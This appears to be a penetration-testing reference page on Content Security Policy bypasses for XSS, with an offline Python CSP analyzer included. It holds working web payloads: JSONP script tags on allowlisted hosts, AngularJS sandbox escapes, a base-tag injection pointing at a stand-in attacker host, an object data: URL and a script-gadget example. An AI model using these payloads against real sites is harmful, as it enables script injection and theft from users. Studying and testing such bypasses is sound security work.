
CSP Bypass Techniques

CWE: CWE-79
Tools: dalfox
Difficulty: 🔴 advanced

Bypass CSP

Content Security Policy is a defense-in-depth control against XSS: it does not remove the injection, it limits what an injected payload is allowed to load or execute. When a target sets one, read the policy directive by directive and look for the gaps below.

Identifying CSP

curl -sI https://target.com | grep -i content-security-policy

Note that a Content-Security-Policy-Report-Only header only reports violations and blocks nothing; only the enforcing header (or meta tag) matters for exploitation.

Also check for meta tag CSP:

<meta http-equiv="Content-Security-Policy" content="...">

unsafe-inline Allowed

If script-src includes 'unsafe-inline' and no nonce or hash source, direct <script> injection works normally. No bypass needed. If a 'nonce-...' or 'sha256-...' source is also present, browsers ignore 'unsafe-inline' for that directive (it is kept only for CSP1 compatibility), so inline injection is blocked.

unsafe-eval Allowed

'unsafe-eval' on its own does not give you execution; it means that string-to-code sinks in the page's existing scripts will run attacker-controlled strings. If script-src includes 'unsafe-eval', look for input reaching:

  • eval(), Function(), setTimeout(string), setInterval(string)
  • Client-side template engines that compile templates with Function() (template expressions become your code)

Whitelisted Domain Exploitation

If a CDN or third-party domain is allowlisted in script-src, find JSONP or script gadget endpoints on that domain. The callback parameter becomes the JavaScript that executes; many JSONP endpoints restrict it to identifier characters, which is why the payloads below use a bare function name. If script-src also contains 'strict-dynamic', host allowlists are ignored and this class of bypass does not apply.

<!-- JSONP endpoint on whitelisted CDN -->
<script src="https://whitelisted-cdn.com/jsonp?callback=alert"></script>

<!-- Google JSONP (if Google is whitelisted) -->
<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert"></script>

JSONP Endpoint Abuse

<script src="https://whitelisted.com/api?callback=alert"></script>

Angular/Framework CSP Bypasses

These require AngularJS to be loaded from an origin the policy allows (typically an allowlisted CDN) and the payload to sit inside an ng-app scope, which you may have to inject as well.

<!-- AngularJS sandbox escape (versions before 1.6; the sandbox was removed in 1.6, so expressions execute without an escape) -->
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

<!-- AngularJS 1.x CSP bypass: fires when the input receives focus -->
<input ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

Base Tag Injection

If base-uri is not set in the CSP (it does not fall back to default-src), injecting a <base> tag re-roots every relative URL on the page, including nonced or allowlisted <script src="/app.js"> tags that now fetch attacker-controlled JavaScript:

<base href="https://attacker.com/">
<!-- All relative URLs now load from attacker domain -->

Object-Data Bypass

If object-src is not restricted (neither object-src nor default-src is set, or the effective value allows data:):

<object data="data:text/html,<script>alert(1)</script>">

Note that data: URLs load in an opaque origin: this proves execution but does not give the script access to the target's DOM or cookies.
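The checks from the preceding sections (Identifying CSP, unsafe-inline, unsafe-eval, allowlisted hosts, base-uri, object-src) can be run offline against a header value. The following analyzer is an added example, not code from this page or from dalfox; the two sample policies are constructed, not captured from any site. It parses the header the way a browser does (first occurrence of a repeated directive wins, object-src falls back to default-src, base-uri does not) and reports which bypass category applies.

```python
"""Offline Content-Security-Policy analyzer (added example, not from the page).

Parses a CSP header value and flags the weaknesses discussed on this page.
Sample policies below are constructed for illustration.
"""

# Fetch directives that fall back to default-src when absent.
# base-uri and form-action are intentionally NOT listed: they never fall back.
FALLS_BACK_TO_DEFAULT = {
    "script-src", "object-src", "style-src", "img-src", "connect-src",
    "font-src", "media-src", "frame-src", "child-src", "worker-src",
}
HASH_OR_NONCE_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")
SCHEME_OR_WILDCARD = {"*", "https:", "http:", "data:", "blob:", "filesystem:"}


def parse_csp(header):
    """Return {directive: [sources]}. Browsers honour only the FIRST
    occurrence of a repeated directive, so later duplicates are dropped."""
    policy = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name not in policy:
            policy[name] = tokens[1:]
    return policy


def effective_sources(policy, directive):
    """Sources governing `directive`, or None when nothing restricts it."""
    if directive in policy:
        return policy[directive]
    if directive in FALLS_BACK_TO_DEFAULT and "default-src" in policy:
        return policy["default-src"]
    return None


def analyze_csp(header):
    """Return a list of (code, detail) findings in the order checked."""
    policy = parse_csp(header)
    findings = []

    script = effective_sources(policy, "script-src")
    if script is None:
        findings.append(("SCRIPT_SRC_MISSING",
                         "no script-src and no default-src: any script runs"))
    else:
        lowered = [s.lower() for s in script]
        nonced = any(s.startswith(HASH_OR_NONCE_PREFIXES) for s in lowered)
        if "'unsafe-inline'" in lowered:
            if nonced:  # CSP2+: a nonce/hash makes 'unsafe-inline' a no-op
                findings.append(("UNSAFE_INLINE_IGNORED",
                                 "'unsafe-inline' is ignored because a nonce/hash is present"))
            else:
                findings.append(("UNSAFE_INLINE", "inline <script> injection works as-is"))
        if "'unsafe-eval'" in lowered:
            findings.append(("UNSAFE_EVAL",
                             "eval()/Function()/setTimeout(string) sinks are usable"))
        if "'strict-dynamic'" in lowered:  # host and scheme sources are ignored
            findings.append(("STRICT_DYNAMIC",
                             "host allowlist ignored; need a nonced script or a gadget"))
        else:
            for src in script:
                low = src.lower()
                if low in SCHEME_OR_WILDCARD:
                    findings.append(("SCRIPT_WILDCARD", f"{src} allows scripts from any matching origin"))
                elif not low.startswith("'"):  # a host source, e.g. a CDN
                    findings.append(("SCRIPT_HOST", f"{src} allowlisted: hunt for JSONP or hosted libraries there"))

    if "base-uri" not in policy:
        findings.append(("BASE_URI_MISSING",
                         "<base href> injection redirects relative script URLs"))

    objects = effective_sources(policy, "object-src")
    if objects is None:
        findings.append(("OBJECT_SRC_OPEN",
                         "no object-src and no default-src: <object data=...> loads anything"))
    elif "'none'" not in [s.lower() for s in objects]:
        findings.append(("OBJECT_SRC_NOT_NONE",
                         f"object-src effectively {' '.join(objects)}: objects from those sources load"))
    return findings


# Constructed sample policies (hypothetical hosts, not captured from any site).
WEAK_POLICY = ("default-src 'self'; "
               "script-src 'self' https://cdn.example.net 'unsafe-eval'; img-src *")
STRICT_POLICY = ("default-src 'none'; "
                 "script-src 'nonce-r4nd0mN0nce' 'strict-dynamic' 'unsafe-inline' https:; "
                 "object-src 'none'; base-uri 'none'")

if __name__ == "__main__":
    for label, pol in (("weak", WEAK_POLICY), ("strict", STRICT_POLICY)):
        print(f"[{label}]")
        for code, detail in analyze_csp(pol) or [("CLEAN", "no findings")]:
            print(f"  {code}: {detail}")
```

Feed it the value extracted by the curl command above; the weak sample reports the unsafe-eval sink, the allowlisted CDN host, the missing base-uri and the object-src fallback to 'self', while the strict sample shows only that its 'unsafe-inline' is dead weight next to the nonce and that 'strict-dynamic' neutralises the https: source.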

Script Gadgets

Exploit existing, already-trusted scripts on the page that read DOM content and process it unsafely. Because the execution happens inside a script the policy permits, gadgets work even against nonces, hashes and 'strict-dynamic':

<div data-template="<img src=x onerror=alert(1)>"></div>
<!-- If a script processes data-template and renders it as HTML (e.g. via innerHTML) -->